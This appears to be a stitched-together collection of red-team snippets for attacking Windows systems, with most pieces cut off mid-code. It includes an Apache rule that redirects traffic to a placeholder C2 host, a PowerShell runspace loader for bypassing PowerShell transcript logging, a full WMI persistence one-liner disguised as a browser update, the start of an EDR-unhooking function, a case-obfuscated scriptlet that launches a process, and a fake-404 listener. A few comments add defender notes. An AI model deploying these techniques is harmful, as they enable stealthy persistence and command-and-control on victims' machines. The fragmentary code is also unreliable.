Sub RunMe() | |
' | |
' Menu -> Tool -> References -> Microsoft Script Control 1.0 & Enable by Clicking it | |
' | |
' | |
Dim jsObj As New ScriptControl | |
Dim Result As Integer | |
jsObj.Language = "JScript" | |
With jsObj |
# The whitelist needs to be formatted like so: | |
# 104.44.44.44 - | |
# 104.33.33.33 - | |
# Load a plain-text lookup map named "ips" from /opt/whitelist.txt
# (one entry per line: client IP as the key, "-" as the value).
RewriteMap ips txt:/opt/whitelist.txt | |
# Condition 1: look the client address up in the map, falling back to the
# literal NOTFOUND; the condition holds only when the address is listed.
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND | |
# Condition 2 (ANDed with the first): the User-Agent header must match this
# pattern; [NC] makes the comparison case-insensitive.
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC] | |
# Only when both conditions hold is /news/<path> reverse-proxied ([P]) to the
# placeholder backend host below.
# Defender note: a request from an unlisted address or with another User-Agent
# does not match this rule, so probing the front host from elsewhere does not
# exercise the proxy path. Detection therefore has to key on client-side egress
# logs: the fixed /news/ URI prefix and the static "Windows NT 6.1; WOW64"
# User-Agent are the stable indicators visible in this rule set.
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P] |
using System; | |
using System.Text; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.EnterpriseServices; |
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 | |
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
# Print the Windows identity this PowerShell session runs as, followed by a
# table of the groups in its token, resolved from SID to account name.
$currentIdentity = [Security.Principal.WindowsIdentity]::GetCurrent()
$currentIdentity

# Calculated column: turn each group SID string into its NTAccount name.
$groupNameColumn = @{
    Label      = "Group Name"
    Width      = 400
    Expression = {
        $groupSid = New-Object System.Security.Principal.SecurityIdentifier($_.Value)
        $groupSid.Translate([System.Security.Principal.NTAccount]).Value
    }
}

$currentIdentity.Groups | Format-Table -Property $groupNameColumn
# Registers a permanent WMI event subscription in the root\subscription namespace.
# Three objects are created, in this order:
#   1. __EventFilter "IEUpdateNOW": a WQL query on Win32_LocalTime modification
#      events that matches when Hour = 9 and Minute = 30 (polled WITHIN 60 seconds).
#   2. CommandLineEventConsumer "IEUpdateNOW": runs the CommandLineTemplate
#      ("powershell -e blah" is a placeholder) non-interactively.
#   3. __FilterToConsumerBinding: ties the filter to the consumer so the command
#      runs whenever the filter matches.
# The subscription lives in the WMI repository rather than in a file or a
# scheduled task, so it persists across reboots until the three objects are removed.
# Defender note: Sysmon logs these creations as event IDs 19 (filter), 20 (consumer)
# and 21 (binding), and the Microsoft-Windows-WMI-Activity/Operational log records
# the binding as event 5861. To audit a host, list the __EventFilter,
# CommandLineEventConsumer and __FilterToConsumerBinding instances in
# root\subscription and review any whose name or command line is not accounted for;
# the name used here imitates a browser-update job.
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | |
# Reference: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)] | |
public static extern IntPtr memcpy(IntPtr dest, string src, uint count); | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
<!--
  Minimal script component: a component element wrapping one script element.
  The script creates a Shell.Application ActiveX object and calls ShellExecute
  on calc.exe with the "open" verb and show value "0" (hidden window);
  calc.exe looks like a harmless stand-in for a real command.
  NOTE(review): the tag names are written in mixed case, presumably to get past
  case-sensitive string matching. Content rules that look for component and
  script tags in downloaded or dropped files should match case-insensitively.
-->
<cOmPoNeNt><sCRipT> | |
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0"); | |
</sCRipT></cOmPoNeNt> |
$serverport = '$port' | |
$httpresponse = ' | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL was not found on this server.</p> |
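# Inventory the ACL of every item under C:\ and write name, provider path and
# the access list (as text) to C:\temp\acl.csv. Items that cannot be enumerated
# or read are skipped. C:\temp must already exist.
# Handling note: the resulting CSV is a map of every permission on the volume,
# including any world-writable locations; keep it in an access-controlled
# place and remove it when the review is done.
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        try {
            # -LiteralPath: with -Path, names containing [ ] * ? are treated as
            # wildcard patterns and the wrong item (or none) is read.
            # -ErrorAction Stop: turns a failed read into a terminating error so
            # the catch block below actually handles it.
            Get-Acl -LiteralPath $_.FullName -ErrorAction Stop |
                Select-Object pschildname,pspath,accesstostring
        }
        catch {
            # Best effort: keep going, but leave a trace when run with -Verbose
            # or $VerbosePreference = 'Continue'.
            Write-Verbose "Get-Acl failed: $($_.Exception.Message)"
        }
    } |
    Export-Csv -Path C:\temp\acl.csv -NoTypeInformation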